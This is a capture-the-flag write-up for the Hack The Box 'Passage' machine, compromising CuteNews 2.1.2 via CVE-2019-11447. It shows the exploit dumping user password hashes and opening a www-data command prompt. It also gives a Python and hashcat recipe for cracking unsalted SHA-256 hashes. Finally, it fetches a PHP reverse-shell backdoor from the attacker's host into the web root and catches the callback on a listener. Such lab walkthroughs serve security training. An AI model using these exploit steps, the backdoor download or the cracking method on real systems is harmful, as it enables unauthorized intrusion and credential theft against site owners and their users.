CVE-2019-11447


┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ python3 CVE-2019-11447.py 
 
 
 
           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
                                ___  _________
                               / _ \/ ___/ __/
                              / , _/ /__/ _/
                             /_/|_|\___/___/
 
 
 
 
[->] Usage python3 expoit.py
 
enter the url> http://10.10.10.206/
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
================================================================
 
=============================
Registering a users
=============================
[+] registration successful with username: 96fOn2TujQ and password: 96fOn2TujQ
 
=======================================================
Sending Payload
=======================================================
signature_key: e83d674a0c845a119a3f1601ad431900-96fOn2TujQ
signature_dsi: f0e5f171f6e4cf58678ff5ac25d81963
logged in user: 96fOn2TujQ
============================
Dropping to a SHELL
============================
 
command > whoami
www-data
 
command > hostname
passage
 
command > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Running the exploit immediately drops me into a command prompt on the target as www-data: it dumps the user password hashes, registers a throwaway account, uploads the payload and then relays each command I type.
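The exploit prints the five user hashes and suggests cracking them with hashcat or john. They are unsalted SHA-256 digests (hashcat mode 1400), so a plain dictionary attack is all that is needed: hash each candidate once and compare against the whole dump. The script below is an added example and is not part of the original writeup or of the exploit script; the five hashes are copied from the exploit output above, while the wordlist and the extra demo hash are constructed here so the script runs offline.

```python
"""
Offline dictionary attack against the unsalted SHA-256 user hashes that the
CVE-2019-11447 exploit dumps (added example; not the exploit's own code).
"""
import hashlib
from typing import Dict, Iterable, List

# Hashes exactly as printed by the exploit run above. CuteNews stores them as
# plain SHA-256, which is why one digest per candidate is enough to test all of
# them at once and why hashcat mode 1400 (raw SHA-256) applies.
DUMPED_HASHES: List[str] = [
    "7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1",
    "4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88",
    "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd",
    "f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca",
    "4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc",
]


def sha256_hex(candidate: str) -> str:
    """Hex digest of the candidate password, lower-case like the dump."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()


def crack(hashes: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {hash: plaintext} for every hash whose preimage is in wordlist.

    Targets are kept in a set so each candidate costs one hash computation
    regardless of how many dumped hashes there are. Stops early once every
    target is recovered.
    """
    targets = {h.strip().lower() for h in hashes if h.strip()}
    found: Dict[str, str] = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not word:
            continue
        digest = sha256_hex(word)
        if digest in targets and digest not in found:
            found[digest] = word
            if len(found) == len(targets):
                break
    return found


def hashcat_command(hashfile: str, wordlist: str) -> str:
    """The equivalent hashcat invocation for a real wordlist such as rockyou."""
    return f"hashcat -m 1400 -a 0 {hashfile} {wordlist}"


if __name__ == "__main__":
    # Constructed demo wordlist (assumption, not a real cracking result): the
    # demo hash is derived from one of these words so the run shows a hit.
    demo_hash = sha256_hex("Summer2020!")
    wordlist = ["password", "123456", "Summer2020!", "letmein"]
    results = crack(DUMPED_HASHES + [demo_hash], wordlist)
    for h in DUMPED_HASHES + [demo_hash]:
        print(h, "->", results.get(h, "<not cracked>"))
    print("\nOn a real box:", hashcat_command("hashes.txt", "rockyou.txt"))
```

Feed the real dump to `hashcat -m 1400` (or `john --format=raw-sha256`) with a proper wordlist; the Python loop is only there to make the mechanics explicit. Any recovered password should be tried for SSH and `su` on the box as well, since the hashes came from the application's own user store.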

Since this pseudo-shell is a bit clunky (every command goes through the exploit's prompt, with no TTY and no job control), I will upgrade it by planting a PHP reverse-shell backdoor in the web root, which www-data can write to. Anything dropped there is reachable by whoever can hit port 80, so it should be removed once a proper shell is in hand.

command > wget http://10.10.14.4/shell.php -O /var/www/html/shell.php

Transferring the backdoor over HTTP from my host (10.10.14.4) into /var/www/html

┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ curl -s http://10.10.10.206/shell.php

Triggering the backdoor by requesting it through the web server, with a listener already waiting on port 9999

┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ nnc 9999            
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.206] 52940
socket: Shell has connected! PID: 3321
whoami
www-data
hostname
passage
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:04:69 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.206/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:469/64 scope global mngtmpaddr dynamic 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:469/64 scope link 
       valid_lft forever preferred_lft forever

Initial foothold established on the target as the www-data user by exploiting CVE-2019-11447 in CuteNews 2.1.2.